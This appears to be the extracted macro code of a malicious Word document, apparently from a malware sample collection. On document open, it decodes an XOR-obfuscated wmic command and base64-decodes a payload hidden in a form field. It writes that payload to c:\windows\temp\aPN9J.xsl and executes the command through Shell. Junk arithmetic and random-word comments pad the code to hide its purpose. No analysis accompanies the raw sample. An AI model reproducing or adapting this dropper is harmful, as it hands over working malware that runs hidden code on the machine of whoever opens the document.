Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "aC716Y"
Sub main()
Dim anY48 As String
Dim aTH5s As Long
aTH5s = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
awH7Bm = Array(115, 105, 109, 103, 36, 116, 118, 107, 103, 97, 119, 119, 36, 104, 109, 119, 112, 36, 43, 98, 107, 118, 105, 101, 112, 62, 38, 103, 62, 88, 115, 109, 106, 96, 107, 115, 119, 88, 112, 97, 105, 116, 88, 101, 84, 74, 61, 78, 42, 124, 119, 104, 38)
If ayk2w9 = False Then
ayk2w9 = True
Else
ayk2w9 = False
End If
' Scorpion chaparral
aDIWan = 9420 / 2355
If ai9ky7 = False Then
ai9ky7 = True
Else
ai9ky7 = False
End If
' Blonde jp malediction sot cumbrous advertise footprint
anY48 = a5W4G1(awH7Bm, aDIWan)
If a1ERd = False Then
a1ERd = True
Else
a1ERd = False
End If
aPRlH aCKAN(anb5g.x.value)
Dim ajdw6X As Long
ajdw6X = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Martian invited unsigned seeker interview complicity
a73HD anY48
Dim aWSsZp As Long
Dim aklGM As Document
Set aklGM = ActiveDocument
aWSsZp = aklGM.ActiveWindow.Panes(1).Pages.Count
Dim aL8W14
aL8W14 = 30411 * 1
' Weedy tinder sk rabbit subdivision encoding dylan wisdom

End Sub
Attribute VB_Name = "aKyMx"
Public Const aZ45g7 As String = "c:\\wi"
Public Const az8eGy As String = "ndows\\te"
Function an3YX(ahE5J, ak8Qmn)
an3YX = ahE5J Xor ak8Qmn
End Function
Function a5W4G1(aGu1wb, a2FqdK)
Dim azNao
azNao = 25144 * 1
' Stationery executives biological jewish suzerainty patriarchal
ahlrH = vbNullString
ao0be = UBound(aGu1wb)
For aPludQ = 0 To ao0be
Dim abS3Rt As Long
With ActiveDocument
abS3Rt = .ActiveWindow.Panes(1).Pages.Count
End With
' Phosphorescent stefan contingency lovable unified
ahlrH = ahlrH & Chr(an3YX(aGu1wb(aPludQ), a2FqdK))
Next
a5W4G1 = ahlrH
End Function
Sub a73HD(aPde9Y)
Dim aiV6Bb As Long
aiV6Bb = 9932 * 1
' Man-of-war urn wisconsin
Dim a9wYmk As Long
With ActiveDocument
a9wYmk = .ActiveWindow.Panes(1).Pages.Count
End With
' Encouraging labs biblical pichunter fs
Dim ac2V3 As Long
ac2V3 = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
VBA.Interaction.Shell@ aPde9Y
aCpL3 = Not (aCpL3)
' Wrangle self-possessed pro. agency mart units

End Sub
Attribute VB_Name = "afQ4bu"
Public Sub aPRlH(aHBRyw)
Dim avxL4 As Integer
Dim aHJ8O As Integer
avxL4 = 128 - 27
aHJ8O = -1513 + 1532
aZNOz = avxL4 + aHJ8O

Dim acvTWl
acvTWl = 26853 * 1
' Vessel walnut formality crowbar flog confront
Set arvdTg = CreateObject("Scripting.FileSystemObject")
Dim aXoTDk As Long
aXoTDk = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Polar classroom assisted
If aTp3Xf = False Then
aTp3Xf = True
Else
aTp3Xf = False
End If
' Pristine wen
Set a48V2 = arvdTg.CreateTextFile(aZ45g7 & az8eGy & "mp" & "\" & "\aPN9J.xsl", 1)
Dim aErDk As Long
Dim aR8LB As Long
aErDk = -68 + 194
aR8LB = 13860 / 385
abHSg = aErDk / aR8LB
' Theologian catherine
a48V2.Write aHBRyw
a48V2.Close
End Sub
Attribute VB_Name = "anb5g"
Attribute VB_Base = "0{F6E490A8-A364-4DF2-86BD-676231E90A96}{8093FC48-EA84-4AEB-ABA9-AD4F94DF2F90}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "arlPnw"
Function aCKAN(aA6EQ As String)
Dim aDMaXj
aDMaXj = 781 * 4
' Incision entire shoes landau eighty-two focuses tightening

Set azWeuq = CreateObject("MSXML2.DOMDocument")
aIze7a = Not (aIze7a)
' Ungodly pondering fifty wheel

Set aY6P2 = azWeuq.createElement("b64")
aY6P2.DataType = "bin.base64"
aY6P2.Text = aA6EQ
aCKAN = StrConv(aY6P2.nodeTypedValue, vbUnicode)

End Function


INQUEST-PP=macro
